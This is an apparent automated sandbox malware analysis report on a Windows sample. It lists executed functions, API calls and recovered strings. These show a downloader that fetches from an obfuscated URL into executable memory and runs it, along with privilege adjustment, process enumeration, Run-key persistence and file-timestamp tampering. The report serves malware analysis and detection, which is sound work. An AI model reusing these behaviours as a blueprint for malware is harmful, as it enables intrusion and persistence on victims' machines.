42800->42812 42803 1000ddf3 __output_l 38 API calls 42801->42803 42804 1000add4 _LocaleUpdate::_LocaleUpdate 40 API calls 42802->42804 42805 1000ae8e 42803->42805 42806 1000aea9 42804->42806 42819 1000dda1 11 API calls __output_l 42805->42819 42808 1000af6b 42806->42808 42811 1000aeb4 42806->42811 42809 1000af79 MultiByteToWideChar 42808->42809 42808->42812 42810 1000af8d 42809->42810 42809->42812 42813 1000ddf3 __output_l 38 API calls 42810->42813 42811->42812 42814 1000aeff GetLastError 42811->42814 42812->42061 42813->42812 42815 1000af3d 42814->42815 42818 1000af0a 42814->42818 42815->42812 42816 1000ddf3 __output_l 38 API calls 42815->42816 42816->42812 42818->42815 42820 1000edcb 40 API calls _LocaleUpdate::_LocaleUpdate 42818->42820 42819->42812 42820->42818 42821->42068 42823 10001799 42822->42823 42824 1000179d LookupPrivilegeValueA 42822->42824 42827 1000ad41 _strtok 5 API calls 42823->42827 42825 100017b2 CloseHandle 42824->42825 42826 100017bd AdjustTokenPrivileges 42824->42826 42825->42823 42826->42825 42828 100017f0 42826->42828 42829 100017fc 42827->42829 42828->42823 42830 100017fe CreateToolhelp32Snapshot 42829->42830 42831 1000cce0 _memset 42830->42831 42832 1000183b Process32FirstW 42831->42832 42833 1000187d 42832->42833 42834 10001881 CloseHandle 42833->42834 42835 10001858 lstrcmpiW 42833->42835 42838 1000ad41 _strtok 5 API calls 42834->42838 42835->42834 42836 1000186f Process32NextW 42835->42836 42836->42833 42839 1000189e 42838->42839 42839->42076 42839->42077 42840->42098 42841->42106 42842->42117 42843->42125 42844->42133 42845->42141 42846->42149 42847->42163 42848->42162 42849->42173 42850->42181 42851->42189 42852->42197 42853->42212 42854->42115 42855->42120 42856->42128 42857->42134 42858->42143 42859->42152 42860->42168 42861->42167 42862->42177 42863->42183 42864->42192 42865->42198 42866->42207 42867->42221 42868->42119 42869->42127 42870->42137 42871->42142 42872->42156 42873->42158 42874->42166 42875->42176 42876->42182 42877->42191 42878->42201 42879->42206 42880->42215 42881->42226 42882->42126 42883->42136 42884->42145 42885->42151 42886->42165 42887->42164 42888->42175 42889->42185 42890->42190 42891->42200 42892->42209 42893->42214 42894->42222 42895->42230 42897 100031d4 GetModuleFileNameA 42896->42897 42897->42239 42898->42240 42899->42242 42901 1000bb7b __freefls@4 42900->42901 42902 1000f7d2 __lock 38 API calls 42901->42902 42914 1000bb82 42902->42914 42906 1000bc2c 42915 1000bc9a 42906->42915 42907 1000bc91 42909 1000ba57 _doexit 3 API calls 42907->42909 42908 1000bca9 __freefls@4 42908->42252 42910 1000bc9a 42909->42910 42911 1000bca7 42910->42911 42920 1000f6f9 RtlLeaveCriticalSection 42910->42920 42911->42252 42913 1000e859 RtlEncodePointer ___crtMessageBoxW 42913->42914 42914->42906 42914->42913 42916 1000bca0 42915->42916 42917 1000bc7a 42915->42917 42921 1000f6f9 RtlLeaveCriticalSection 42916->42921 42917->42908 42919 1000f6f9 RtlLeaveCriticalSection 42917->42919 42919->42907 42920->42911 42921->42917

                                Executed Functions

                                Function 026D0031 Relevance: 70.8, APIs: 2, Strings: 38, Instructions: 811memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetNativeSystemInfo.KERNEL32(?), ref: 026D04A2
                                • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 026D04D2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: AllocInfoNativeSystemVirtual
                                • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                • API String ID: 2032221330-2899676511
                                • Opcode ID: 15b3c3a1d8b5dafea4a93bb4805a509b4eeb6b1eaca912e0ae13e9403863b76d
                                • Instruction ID: 125fb7447bfd6da81805a70f68dded0a9a0b40837b63566c86f8367696f58d18
                                • Opcode Fuzzy Hash: 15b3c3a1d8b5dafea4a93bb4805a509b4eeb6b1eaca912e0ae13e9403863b76d
                                • Instruction Fuzzy Hash: 26628A71A083898FE724CF25C880BABBBE5BF94308F04592DE9C98B351E770D945CB56
                                Function 00419560 Relevance: 32.0, APIs: 8, Strings: 10, Instructions: 453networkmemorythreadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 422 419560-4196da call 419d50 call 419d80 * 3 432 4196e5-4196e9 422->432 433 4196eb-4196fd 432->433 434 4196ff-4197fa call 419d80 432->434 433->432 439 419805-419809 434->439 440 419825-4198c0 ShellExecuteA call 419d80 * 2 CreateThread call 419d80 439->440 441 41980b-419823 439->441 450 4198c6 440->450 451 419ca8-419cc5 440->451 441->439 452 4198cd-4198d4 450->452 453 419900-419907 452->453 454 4198d6-4198e7 452->454 453->451 456 41990d-419914 453->456 459 4198e9 454->459 460 4198eb-4198f8 454->460 456->451 458 41991a-419b59 call 419d80 * 2 VirtualAlloc call 419d80 call 419eb0 call 419d80 * 4 456->458 483 419b64-419b68 458->483 459->453 463 4198fa 460->463 464 4198fe 460->464 463->453 464->452 484 419b6a-419b7c 483->484 485 419b7e-419baf VirtualAlloc 483->485 484->483 487 419bb6-419c09 InternetOpenA InternetOpenUrlA 485->487 489 419c10-419c14 487->489 490 419c44-419c4d 489->490 491 419c16-419c42 InternetReadFile 489->491 490->487 492 419c53-419ca1 call 419f20 CreateThread 490->492 491->489 492->451
                                APIs
                                • ShellExecuteA.SHELL32(00000000,rshq,xk>33wixperkyekiCperkAgpewwmg1~l1gr,00000000,00000000,00000001), ref: 00419838
                                • CreateThread.KERNEL32(00000000,00000000,?,00016B48,00000000,00000000), ref: 00419884
                                • VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000004), ref: 004199D6
                                • VirtualAlloc.KERNEL32(00000000,00400000,00001000,00000040), ref: 00419B96
                                • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00419BC0
                                • InternetOpenUrlA.WININET(?,lxxt>33{if2eh<;l=6n2gsq383psrk2fqt,00000000,00000000,80000000,00000000), ref: 00419BE2
                                • InternetReadFile.WININET(?,00000000,00002000,00000000), ref: 00419C2A
                                • CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00419C8D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Internet$AllocCreateOpenThreadVirtual$ExecuteFileReadShell
                                • String ID: yD!$"$#$Shell32$kernelbase.dll$lxxt>33{if2eh<;l=6n2gsq383psrk2fqt$msvcrt$rshq$wininet$xk>33wixperkyekiCperkAgpewwmg1~l1gr
                                • API String ID: 2427132717-3945075071
                                • Opcode ID: 69266da5197d4156bfa68b13fef2e2114937dfde714d3901c17851fe9ed831eb
                                • Instruction ID: e9b11799bc4cc1d8ec3bd6e8b4b94759ef8f7747d7e9bd4f42a0b0e3c3dc26ba
                                • Opcode Fuzzy Hash: 69266da5197d4156bfa68b13fef2e2114937dfde714d3901c17851fe9ed831eb
                                • Instruction Fuzzy Hash: FF322D70D08398DEEB21CBA8C845BDDBFB56F15708F1441C9D1887B282D7BA1A85CF66
                                Function 0040EB30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32(Function_0000EAD0,3F7259E2), ref: 0040EB63
                                • GetClassInfoW.USER32(?,#32770,?), ref: 0040EBC2
                                • InitCommonControlsEx.COMCTL32(?), ref: 0040EBEF
                                • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040EC16
                                  • Part of subcall function 005373CC: _malloc.LIBCMT ref: 005373EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: ClassCommonControlsExceptionFilterGdiplusInfoInitStartupUnhandled_malloc
                                • String ID: #32770
                                • API String ID: 3338494789-463685578
                                • Opcode ID: 451ebffd18cfcb30c8332fa409f70244c359509bb77b1719bd2b1b0b7cee76ff
                                • Instruction ID: f5d5fc1f3776b5d2185d5017cf2985b55b0a1cf5fb9be8e53022bb48848d8530
                                • Opcode Fuzzy Hash: 451ebffd18cfcb30c8332fa409f70244c359509bb77b1719bd2b1b0b7cee76ff
                                • Instruction Fuzzy Hash: BC41B6B15083429BE704EF65DC49B5BBBE5FB88704F004A3EF549932D1EBB9D4088B96
                                Function 10008BDA Relevance: 4.9, APIs: 3, Instructions: 395timeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 974 10008bda-10008c06 975 10009159 974->975 976 10008c0c-10008c11 974->976 977 1000915e-1000916c call 1000ad41 975->977 976->975 978 10008c17-10008c1b 976->978 979 10008c25-10008c2f 978->979 980 10008c1d-10008c22 call 10008a54 978->980 983 10008c31-10008c34 979->983 984 10008c45-10008c48 979->984 980->979 987 10008c36-10008c3c 983->987 988 10008c4a-10008c8d 983->988 984->988 989 10008c8f-10008c94 984->989 990 10008c3e-10008c40 987->990 988->990 991 10008ca6-10008cab 989->991 992 10008c96-10008ca3 call 10008487 989->992 990->977 994 10008cca-10008d00 call 10008264 call 1000850d 991->994 995 10008cad-10008cc8 call 100084bc 991->995 992->991 1002 10008d05-10008d0a 994->1002 995->994 1003 10008d16-10008d29 call 10007e17 1002->1003 1004 10008d0c-10008d11 1002->1004 1007 10008d35-10008d68 call 1000bd08 call 10007e76 1003->1007 1008 10008d2b-10008d30 1003->1008 1004->977 1013 10008d78-10008d7f 1007->1013 1014 10008d6a-10008d76 call 1000b8df 1007->1014 1008->977 1016 10008d81-10008d92 1013->1016 1014->1008 1016->1016 1018 10008d94 1016->1018 1019 10008d9a-10008d9e 1018->1019 1020 10008da0-10008da4 1019->1020 1021 10008dab-10008dad 1019->1021 1020->1021 1022 10008da6-10008da9 1020->1022 1023 10008db3-10008db4 1021->1023 1024 10008daf-10008db1 1021->1024 1022->1019 1023->1019 1024->1023 1025 10008db6-10008dc5 call 1000bfdf 1024->1025 1028 10008dc7-10008dd6 call 1000bfdf 1025->1028 1029 10008dfa-10008dfd 1025->1029 1028->1029 1032 10008dd8-10008de7 call 1000bfdf 1028->1032 1029->1019 1032->1029 1035 10008de9-10008df8 call 1000bfdf 1032->1035 1035->1029 1038 10008dff-10008e49 call 1000be5b 1035->1038 1041 10008e5a-10008e86 1038->1041 1042 10008e4b-10008e4e 1038->1042 1043 10008e8c-10008e95 1041->1043 1042->1041 1044 10008e50-10008e53 1042->1044 1045 10008ea1-10008ea8 1043->1045 1046 10008e97 1043->1046 1044->1041 1047 10008e55-10008e58 1044->1047 1048 10008eb1-10008eb8 1045->1048 1049 10008eaa 1045->1049 1046->1045 1047->1041 1047->1043 1050 10008ec1-10008ec3 1048->1050 1051 10008eba 1048->1051 1049->1048 1052 10008ec5 1050->1052 1053 10008ecc-10008ed3 1050->1053 1051->1050 1052->1053 1054 10008ed5 1053->1054 1055 10008edc-10008fd9 SystemTimeToFileTime LocalFileTimeToFileTime 1053->1055 1054->1055 1056 10009120 1055->1056 1057 10008fdf 1055->1057 1059 10009126-10009128 1056->1059 1058 10008fe5-10009010 1057->1058 1060 10009012-10009024 1058->1060 1061 1000902b-10009051 1058->1061 1062 10009131-1000914e 1059->1062 1063 1000912a-10009130 call 1000b8df 1059->1063 1060->1058 1066 10009026 1060->1066 1064 10009053-10009094 call 10005d90 1061->1064 1065 10009096 1061->1065 1062->975 1063->1062 1070 1000909c-100090a3 1064->1070 1065->1070 1066->1059 1072 100090e0-100090e7 1070->1072 1073 100090a5-100090da call 10005d90 1070->1073 1072->1059 1075 100090e9-1000911a call 10005d90 1072->1075 1073->1072 1075->1056
                                APIs
                                  • Part of subcall function 10007E17: SetFilePointer.KERNEL32(FA83E855,00000000,00000000,00000002,10007FCD,?,00000000,?,?,?,10008124,?,00000140,00000000,00000000), ref: 10007E43
                                • __fassign.LIBCMT ref: 10008E09
                                • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 10008F6E
                                • LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 10008F9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: FileTime$LocalPointerSystem__fassign
                                • String ID:
                                • API String ID: 3768451866-0
                                • Opcode ID: 40e32fb4b8a00f69b7b1568f7fad5f0b1312cb9daff528d9d1dbc7183ed708c9
                                • Instruction ID: 557576cbc3803644095bf150e3d73ac2e181a1a26de8671f3226a8038d31e2d8
                                • Opcode Fuzzy Hash: 40e32fb4b8a00f69b7b1568f7fad5f0b1312cb9daff528d9d1dbc7183ed708c9
                                • Instruction Fuzzy Hash: 56F1E171A046699BEB64CF24C8847D9BBF0FF18380F1046EAE899D7285D735AB85CF50
                                Function 100039A3 Relevance: 202.6, APIs: 68, Strings: 47, Instructions: 1399sleepregistrylibraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 100039a3-10003b44 call 10010ab0 call 1000cce0 5 10003b46-10003b59 0->5 5->5 6 10003b5b-10003c9d Sleep call 1000cce0 5->6 9 10003c9f-10003cb2 6->9 9->9 10 10003cb4-10003dee Sleep call 1000cce0 9->10 13 10003df0-10003e03 10->13 13->13 14 10003e05-10003e49 call 1000b9db call 1000b8ac call 1000cce0 call 1000b8be 13->14 23 10003e72-10003f0d call 1000cce0 wsprintfA call 1000cce0 14->23 24 10003e4b-10003e70 call 1000b8be 14->24 32 10003f0f-10003f20 23->32 24->23 32->32 33 10003f22-10003f7a Sleep call 1000cce0 wsprintfA 32->33 39 10003f7b-10003f81 33->39 39->39 40 10003f83-10003ffe call 1000cce0 wsprintfA call 1000cce0 39->40 45 10004000-10004011 40->45 45->45 46 10004013-10004087 Sleep call 1000cce0 wsprintfA call 1000cce0 45->46 51 10004089-1000409a 46->51 51->51 52 1000409c-1000410b Sleep call 1000cce0 wsprintfA call 1000cce0 51->52 57 1000410d-1000411e 52->57 57->57 58 10004120-10004132 57->58 59 10004137-10004176 call 100028b9 Sleep 58->59 62 10004178-100041b3 call 100028b9 Sleep 59->62 65 100041b5-100041f0 call 100028b9 Sleep 62->65 68 100041f2-10004219 call 1000b9db call 1000b8ac call 1000cce0 65->68 75 1000421b-10004237 call 1000b8be 68->75 78 10004239-10004487 call 1000cce0 * 2 call 100059cb call 100059a5 call 100059cb * 4 call 1000a063 call 10002e6f Sleep * 2 call 1000cce0 call 1000afbd call 1000cce0 * 2 call 1000b91d FindWindowExA 75->78 111 10004705-10004729 call 1000cce0 78->111 112 1000448d-10004495 call 100018ea 78->112 119 1000472b-10004730 111->119 117 100044b6-100044b9 112->117 118 10004497-100044b1 call 10002388 Sleep 112->118 121 10004699-10004700 GlobalAddAtomA 117->121 122 100044bf-1000463f call 1000356a 117->122 118->121 119->119 123 10004732-1000473b 119->123 152 10004c13-10004c2e Sleep call 100031c7 Sleep call 1000bcaf 121->152 138 10004641-10004658 Sleep call 1000356a 122->138 139 1000465b-10004689 call 10002887 call 100036ed 122->139 125 1000473c-10004742 123->125 125->125 127 10004744-1000475b 125->127 129 1000475c-10004762 127->129 129->129 131 10004764-10004771 129->131 134 10004772-10004778 131->134 134->134 136 1000477a-100047a6 call 1000cce0 134->136 146 100047a7-100047ad 136->146 138->139 139->121 156 1000468b-10004698 call 10001144 139->156 146->146 148 100047af-100047be 146->148 151 100047bf-100047c5 148->151 151->151 155 100047c7-100047d4 151->155 166 10004c33-10004c50 RegOpenKeyExA 152->166 158 100047d5-100047db 155->158 156->121 158->158 160 100047dd-10004809 call 1000cce0 158->160 167 1000480a-10004810 160->167 168 10004c52-10004c59 166->168 169 10004c95 166->169 167->167 170 10004812-10004821 167->170 171 10004c5c-10004c61 168->171 173 10004c97-10004ca5 Sleep 169->173 172 10004822-10004828 170->172 171->171 174 10004c63-10004c8e RegSetValueExA RegCloseKey 171->174 172->172 175 1000482a-10004839 172->175 176 10004b3b-10004bd2 call 1000cce0 LoadLibraryA call 1000cce0 GetProcAddress 173->176 177 10004cab-10004cb9 call 10002388 173->177 174->169 179 10004c90-10004c93 174->179 180 1000483a-10004840 175->180 176->152 190 10004bd4-10004c11 call 1000cce0 ShellExecuteA 176->190 177->176 179->173 180->180 184 10004842-10004852 180->184 186 10004853-10004859 184->186 186->186 187 1000485b-1000486b 186->187 189 1000486c-10004872 187->189 189->189 191 10004874-10004882 189->191 190->152 194 10004883-10004889 191->194 194->194 195 1000488b-1000489b 194->195 196 1000489c-100048a2 195->196 196->196 197 100048a4-100048b4 196->197 198 100048b5-100048bb 197->198 198->198 199 100048bd-100048cc 198->199 200 100048cd-100048d3 199->200 200->200 201 100048d5-100048e3 200->201 202 100048e4-100048ea 201->202 202->202 203 100048ec-100048fc 202->203 204 100048fd-10004903 203->204 204->204 205 10004905-10004914 204->205 206 10004915-1000491b 205->206 206->206 207 1000491d-1000492d 206->207 208 1000492f-10004934 207->208 208->208 209 10004936-1000493f 208->209 210 10004940-10004946 209->210 210->210 211 10004948-1000495f 210->211 212 10004960-10004966 211->212 212->212 213 10004968-100049d8 call 1000cce0 call 1000afbd call 1000cce0 212->213 220 100049d9-100049e2 213->220 220->220 221 100049e4-100049f3 220->221 222 100049f6-100049ff 221->222 222->222 223 10004a01-10004a12 222->223 224 10004a14-10004a1c 223->224 224->224 225 10004a1e-10004a27 224->225 226 10004a2a-10004a33 225->226 226->226 227 10004a35-10004abf call 1000cce0 * 2 call 1000b91d FindWindowExA 226->227 227->166 234 10004ac5-10004af9 call 10001030 Sleep 227->234 238 10004b39 234->238 239 10004afb-10004b1b 234->239 238->176 241 10004b33 239->241 242 10004b1d-10004b23 239->242 241->238 242->241 243 10004b25-10004b2f 242->243 243->241
                                APIs
                                • _memset.LIBCMT ref: 10003B3C
                                • Sleep.KERNEL32(00000001), ref: 10003B63
                                • _memset.LIBCMT ref: 10003C95
                                • Sleep.KERNEL32(00000001), ref: 10003CB6
                                • _memset.LIBCMT ref: 10003DE6
                                • __time64.LIBCMT ref: 10003E06
                                • _memset.LIBCMT ref: 10003E29
                                • _rand.LIBCMT ref: 10003E31
                                • _rand.LIBCMT ref: 10003E4B
                                • _memset.LIBCMT ref: 10003EC9
                                • wsprintfA.USER32 ref: 10003EEE
                                • _memset.LIBCMT ref: 10003F05
                                • Sleep.KERNEL32(00000001), ref: 10003F36
                                • _memset.LIBCMT ref: 10003F49
                                • wsprintfA.USER32 ref: 10003F66
                                • _memset.LIBCMT ref: 10003FB5
                                • wsprintfA.USER32 ref: 10003FDB
                                • _memset.LIBCMT ref: 10003FF6
                                • Sleep.KERNEL32(00000001), ref: 10004015
                                • _memset.LIBCMT ref: 10004047
                                • wsprintfA.USER32 ref: 10004068
                                • _memset.LIBCMT ref: 1000407F
                                • Sleep.KERNEL32(00000001), ref: 1000409E
                                • _memset.LIBCMT ref: 100040CB
                                • wsprintfA.USER32 ref: 100040EC
                                • _memset.LIBCMT ref: 10004103
                                  • Part of subcall function 100028B9: _memset.LIBCMT ref: 10002908
                                  • Part of subcall function 100028B9: _memset.LIBCMT ref: 1000291A
                                  • Part of subcall function 100028B9: _memset.LIBCMT ref: 10002929
                                • Sleep.KERNEL32(000003F2), ref: 1000416B
                                • Sleep.KERNEL32(000003F2), ref: 100041A8
                                • Sleep.KERNEL32(000003F2), ref: 100041E5
                                • __time64.LIBCMT ref: 100041F3
                                • _memset.LIBCMT ref: 10004211
                                • _rand.LIBCMT ref: 1000421B
                                • _memset.LIBCMT ref: 1000424A
                                • _memset.LIBCMT ref: 100042A8
                                  • Part of subcall function 1000A063: __EH_prolog3_GS.LIBCMT ref: 1000A06D
                                  • Part of subcall function 1000A063: wsprintfA.USER32 ref: 1000A0FC
                                  • Part of subcall function 1000A063: OutputDebugStringA.KERNEL32(?,?,?,?,?,?,10017380,000000FF), ref: 1000A435
                                  • Part of subcall function 10002E6F: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 10002E8B
                                  • Part of subcall function 10002E6F: GetFileSize.KERNEL32(00000000,00000000), ref: 10002E96
                                  • Part of subcall function 10002E6F: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 10002EB1
                                • Sleep.KERNEL32(00000001), ref: 100043C8
                                • Sleep.KERNEL32(00000320), ref: 100043CF
                                • _memset.LIBCMT ref: 100043E9
                                • _mbstowcs.LIBCMT ref: 10004406
                                  • Part of subcall function 1000AFBD: __mbstowcs_l_helper.LIBCMT ref: 1000AFDD
                                • _memset.LIBCMT ref: 10004427
                                • _memset.LIBCMT ref: 1000444E
                                • _strcat_s.LIBCMT ref: 1000446B
                                • FindWindowExA.USER32(00000000,00000000,?,00000000), ref: 1000447E
                                • Sleep.KERNEL32(?,?,?,?,?,?,?,?,00000000,000000FB), ref: 100044AB
                                • GlobalAddAtomA.KERNEL32(?), ref: 100046A1
                                • _memset.LIBCMT ref: 1000471A
                                • _memset.LIBCMT ref: 10004797
                                • _memset.LIBCMT ref: 100047FA
                                  • Part of subcall function 100018EA: OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 10001BCD
                                  • Part of subcall function 100018EA: OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 10001BEB
                                  • Part of subcall function 100018EA: CloseHandle.KERNEL32(?), ref: 10001BF8
                                  • Part of subcall function 100018EA: OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 10001E65
                                  • Part of subcall function 100018EA: OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 10001E83
                                  • Part of subcall function 100018EA: CloseHandle.KERNEL32(?), ref: 10001E90
                                  • Part of subcall function 100018EA: OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 100020FD
                                  • Part of subcall function 100018EA: OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 1000211B
                                  • Part of subcall function 100018EA: CloseHandle.KERNEL32(?), ref: 10002128
                                  • Part of subcall function 10002388: __EH_prolog3_GS.LIBCMT ref: 10002392
                                  • Part of subcall function 10002388: VariantInit.OLEAUT32(?), ref: 100023D4
                                  • Part of subcall function 10002388: VariantInit.OLEAUT32(?), ref: 100023F4
                                  • Part of subcall function 10002388: VariantInit.OLEAUT32(?), ref: 10002411
                                  • Part of subcall function 10002388: VariantInit.OLEAUT32(?), ref: 1000242E
                                • _memset.LIBCMT ref: 10004B66
                                • LoadLibraryA.KERNEL32(?,?,00000000,000000F3), ref: 10004B76
                                • _memset.LIBCMT ref: 10004BB7
                                • GetProcAddress.KERNEL32(00000000,?), ref: 10004BC8
                                • _memset.LIBCMT ref: 10004BF4
                                • ShellExecuteA.SHELL32(00000000,?,?,00000000,00000000,00000005,?,00000000,000000FA,?,?,?,?,00000000,000000F1), ref: 10004C11
                                • Sleep.KERNEL32(000003E8,?,?,?,?,00000000,000000F1), ref: 10004C1E
                                  • Part of subcall function 100031C7: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100031EE
                                  • Part of subcall function 100031C7: _strrchr.LIBCMT ref: 100031FD
                                • Sleep.KERNEL32(00000001,?,?,?,?,00000000,000000F1), ref: 10004C27
                                  • Part of subcall function 1000BCAF: _doexit.LIBCMT ref: 1000BCBB
                                • RegOpenKeyExA.KERNEL32(80000001,1001A800,00000000,000F003F,?), ref: 10004C48
                                • RegSetValueExA.KERNEL32(?,1001A830,00000000,00000001,?,?,?,?,?,?,00000000,000000F1), ref: 10004C7A
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,000000F1), ref: 10004C86
                                • Sleep.KERNEL32(000003E8), ref: 10004C9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: _memset$Sleep$Open$Processwsprintf$CloseFileInitVariant$HandleToken_rand$H_prolog3___time64$AddressAtomCreateDebugExecuteFindGlobalLibraryLoadModuleNameOutputProcReadShellSizeStringValueWindow__mbstowcs_l_helper_doexit_mbstowcs_strcat_s_strrchr
                                • String ID: (x8$%s%s$%s%s$%s.e$.exe$0SafeMonClass$2.l$6)\$A$BkSha$C:\P$CU\SOF$G_SZ /d "$Open$Q36$Shel$Shel$TWARE\Mic$am F$cef.dll$cute$d "HK$dll$dowWndClass$dows\Curr$entVe$ft\Win$g.e$iles$l32.$lExe$lalala123%$le:///$long$mo /t RE$rogr$roso$rsion\R$t3d.$t4d.$t5d.$text/$tmp$tmp$tmp$un" /v de$xe
                                • API String ID: 2119807209-329007690
                                • Opcode ID: c9c76253132aca2ab718f9d89e5fd2c160784e6ca4753814a731e3336da5125a
                                • Instruction ID: dc6513a9a33df5a03291291388f4a278a9130dac831befe3f30b2f877d04dd66
                                • Opcode Fuzzy Hash: c9c76253132aca2ab718f9d89e5fd2c160784e6ca4753814a731e3336da5125a
                                • Instruction Fuzzy Hash: 14B2E27554C3C5AAE221DB60D841FABB7E9EFC4740F00482EF5C8CB291EAB199458B97
                                Function 100092BD Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 252filetimeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 495 100092bd-100092f0 496 100092f2-100092f4 call 10008a54 495->496 497 100092f9-10009305 495->497 496->497 499 10009311-10009314 497->499 500 10009307-1000930c 497->500 502 10009323-10009328 499->502 503 10009316-1000931d call 10008487 499->503 501 100095f3-10009601 call 1000ad41 500->501 506 1000932a-10009336 call 100084bc 502->506 507 1000933e-10009359 call 10008bda 502->507 503->502 514 10009338 506->514 515 10009388-10009393 507->515 516 1000935b-1000935d 507->516 514->507 517 100093a3-100093a5 515->517 518 1000936d-10009370 516->518 519 1000935f-10009361 516->519 520 10009395-10009397 517->520 521 100093a7-100093be call 1000be5b 517->521 523 1000937a-10009383 call 1000916f 518->523 519->518 522 10009363-10009365 519->522 524 10009399-1000939b 520->524 525 1000939d 520->525 533 100093c4 521->533 534 1000945c-1000946f 521->534 527 10009372-10009379 522->527 528 10009367-1000936b 522->528 523->501 524->525 530 100093a0-100093a1 524->530 525->530 527->523 528->518 528->527 530->517 537 100093cb-10009452 call 1000cce0 * 2 call 1000b91d call 1000b560 533->537 535 10009471-10009478 534->535 536 10009494-100094bf call 1000ad50 call 1000916f 534->536 535->536 538 1000947a-10009481 535->538 548 100094ef-10009515 CreateFileA 536->548 557 100094c1 537->557 558 10009454-1000945a 537->558 538->537 541 10009487-1000948e 538->541 541->536 541->537 550 10009521-10009535 call 100086d0 548->550 551 10009517-1000951c 548->551 559 10009537-10009542 call 1000bd08 550->559 560 10009548 550->560 551->501 561 100094c2-100094e0 call 1000ad50 call 1000916f 557->561 558->561 559->560 563 1000954e-1000956e call 10008829 560->563 572 100094e5-100094ed 561->572 570 10009604-1000960e 563->570 571 10009574-10009576 563->571 573 100095b0-100095be call 10008a54 570->573 574 100095a6 571->574 575 10009578 571->575 572->548 582 100095c0-100095db SetFileTime 573->582 583 100095e1-100095ed CloseHandle 573->583 574->573 576 10009599-100095a0 575->576 577 1000957a-10009597 WriteFile 575->577 576->573 580 100095a2-100095a4 576->580 577->576 579 10009610-1000961a 577->579 579->573 580->563 580->574 582->583 583->501
